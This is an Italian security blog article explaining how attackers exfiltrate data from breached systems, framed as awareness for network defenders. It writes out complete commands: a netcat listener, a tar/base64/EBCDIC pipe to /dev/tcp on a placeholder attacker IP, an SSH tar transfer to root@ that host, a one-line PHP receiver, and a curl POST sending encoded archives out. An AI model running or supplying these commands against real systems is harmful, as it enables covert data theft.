Fernando Curzi : 19 Dicembre 2022 08:13
Abbiamo più volte parlato di Data Breach con Red Hot Cyber , grosse mole di dati esfiltrati da banche dati e rivenduti sul darkweb. Ma come avvengono tecnicamente queste transizioni?
In teoria una volta che il cyber criminale è stato in grado di mettere mano sulle informazioni sensibili attraverso uno sfruttamento di una Backdoor o di una sessione persistente APT (Advanced Session Threat), avrà necessità di spostare questi dati al di fuori dell’infrastruttura in modo sicuro e il più inosservato possibile all’interno di sistemi gestiti dall’organizzazione criminale.
La fantasia in questi scenari non tarda ad arrivare.
Vuoi diventare un esperto del Dark Web e della Cyber Threat Intelligence (CTI)?Stiamo per avviare il corso intermedio in modalità "Live Class" del corso "Dark Web & Cyber Threat Intelligence". A differenza dei corsi in e-learning, disponibili online sulla nostra piattaforma con lezioni pre-registrate, i corsi in Live Class offrono un’esperienza formativa interattiva e coinvolgente. Condotti dal professor Pietro Melillo, le lezioni si svolgono online in tempo reale, permettendo ai partecipanti di interagire direttamente con il docente e approfondire i contenuti in modo personalizzato. Questi corsi, ideali per aziende, consentono di sviluppare competenze mirate, affrontare casi pratici e personalizzare il percorso formativo in base alle esigenze specifiche del team, garantendo un apprendimento efficace e immediatamente applicabile. Guarda subito l'anteprima gratuita del corso su academy.redhotcyber.com Contattaci per ulteriori informazioni tramite WhatsApp al 375 593 1011 oppure scrivi a [email protected]  Supporta RHC attraverso:
Se ti piacciono le novità e gli articoli riportati su di Red Hot Cyber, iscriviti immediatamente alla newsletter settimanale per non perdere nessun articolo. La newsletter generalmente viene inviata ai nostri lettori ad inizio settimana, indicativamente di lunedì. |
Con questo articolo si cerca di mostrare come avvengono le esfiltrazioni in modo da sensibilizzare i tecnici ponendo l’ attenzione su alcune configurazioni di policy di networking che non dovrebbero essere tralasciate.
Uno dei metodi più comuni da attuare è quello che prevede la creazione di un socket TCP locale sul sistema vittima che punta alla macchina dell’attaccante, dualmente su quest’ultima potrebbe essere configurato un Listner con Netcat che si mette in ascolto per la ricezione dei dati.
In genere gli aggressori per evitare il monitoraggio on-the-wire effettuano compressioni e codifiche dei dati in Base64 ed EBCDIC (Extended Binary Codec Decimal Interchange Code) e solo dopo queste prime procedure avviano il vero trasferimento dei dati verso il proprio sistema ove verranno poi decodificati.
Vediamo alcuni comandi che potrebbe utilizzare un malintenzionato nell’attività di data exfiltration:
L’aggressore sul suo sistema, per prima cosa configura un listner con Netcat sulla porta TCP/80 per ricevere i dati in entrata reindirizzando l’output ad un file “data.tmp”
Il comando è:
nc –nlvpc 80 > data.tmp
Sul sistema vittima (si sottointende che sia già violato) potrebbe avere senso una compressione della cartella da esfiltrare sull’output standard (stdout) (-) codificando il tutto con Base64 e EBCID, reindirizzando subito dopo i dati sul proprio socket TCP locale della sua macchina. Nell’esempio che ho fatto data.tmp è la cartella contenente i dati da esfiltrare. Il comando completo potrebbe essere questo:
tar zfc - /tmp/datafolder | base64 | dd conv=ebcdic > /dev/tcp/<indirizzoIP_attaccante>/80
Sulla macchina attaccante l’aggressore decodifica il file data.tmp sull’output data.tar
dd conv=ascii if=data.tmp |base64 –d > data.tar
L’aggressore estrae l’archivio data.tar sul proprio sistema avendo disponibilità dei dati in chiaro.
Un altro metodo un po’ più semplice e altrettanto comune è quello di non codificare i dati in transito nella rete ma cifrarli utilizzando il protocollo SSH. Il metodo con cifratura potrebbe avere migliori probabilità di eludere qualsiasi sistema di monitoraggio nella rete da parte degli IPS e IDS.
Sul sistema vittima , l’aggressore esegue il comando:
tar zfc - /tmp/data | ssh root@<indirizzoIP_attaccante> “cd /tmp; tar zxpf –“
Sul sistema attaccante i dati sono già decompressi nella cartella tmp/data e potrà visualizzarli direttamente.
Per una maggiore “furtività”, potrebbe configurare un suo server SSH sulla porta 80 e non sulla porta 22 utilizzata comunemente da SSH.
Il terzo metodo ha un paio di prerequisiti ma è un altro ottimo modo per trasferire dati su protocolli cifrati, in questo caso Https con certificati SSL.
Per svolgere questo tipo di esfiltrazione l’aggressore deve disporre necessariamente un web server con PHP e un certificato SSL installato.
Sul sistema attaccante, l’aggressore potrebbe creare un file PHP che scriverà i dati ricevuti come POST request all’interno di un file chiamato /tmp/datafolder.base64 , per distinguerlo chiamerò questo file “contact.php”. Per una maggiore furtività il codice contenuto del file potrebbe essere inserito in single line (in una riga).
Contact.php
<?php file_put_contents(‘/tmp/data.base64’, file_get_contents(‘php://input’)); ?>
Sul sistema vittima l’aggressore invierà il comando curl con una richiesta POST costituita dai dati compressi e codificati in tar e Base64 dalla directory /tmp/data della vittima, che si tradurrà in una richiesta POST al file contact.php sul web server da lui gestito che svolgerà la funzione di scrivere una copia dell’archivio. Il comando potrebbe essere questo:
curl --data “$(tar zcf - /tmp/data | base64)” https://<indirizzoIP_attaccante>/contact.php
La macchina dell’attaccante dopo aver ricevuto i dati via POST li ha scritti nel file /tmp/data.base64 reindirizzando l’output ad un archivio data.tar
cat /tmp/data.base64 | base64 –d > data.tar && tar xf data.tar
Questi sono solo alcuni esempi di tecniche exfiltration ma considerando che ormai l’avvento dei ransomware ha reso il tutto più dinamico, molti di questi comandi insieme ad altri vengono introdotti e integrati all’interno del codice sorgente dei malware. Un buon sistema di monitoraggio abbinato ad un adeguato grado di sicurezza dei sistemi potrebbe bloccare un eventuale data breach, e con “buon sistema di monitoraggio” intendo in questo caso che non bisogna tralasciare nessun protocollo, ignorare il monitoraggio sui protocolli di rete che svolgono determinate funzioni considerate “sicure” come per esempio il “DNS” non è una buona pratica e vanno assolutamente monitorati e attuate policy adeguate che non ritengo opportuno elencare in questo articolo. Su questo argomento comunque ci ritorneremo con Hackerhood, per gli scettici vedremo un tutorial completo di come avviene una creazione di un server per un’esfiltrazione via DNS e una triangolazione verso il sistema attaccante.
Fernando CurziQuest’anno Microsoft celebra i suoi primi 50 anni, un traguardo che riflette la trasformazione dell’azienda da piccola start-up nel 1975 a colosso globale della tecnologia. Fondata da Bill Gates e...
La società Microsoft ha reso noto di essere impegnata nell’investigazione di un’anomalia di rilievo riguardante il client desktop tradizionale di Outlook per il sistema operativo Windows, anomali...
Un nuovo gruppo di hacker legato al Partito Comunista Cinese è stato identificato dagli esperti di Palo Alto Networks. L’Unità 42, divisione di intelligence sulle minacce della società california...
I sistemi di Intelligenza Artificiale Generativa (GenAI) stanno rivoluzionando il modo in cui interagiamo con la tecnologia, offrendo capacità straordinarie nella creazione di contenuti testuali, imm...
Broadcom ha risolto una grave vulnerabilità di escalation dei privilegi in VMware Aria Operations e VMware Tools, che era stata sfruttata in attacchi a partire da ottobre 2024. Al problema è stato a...
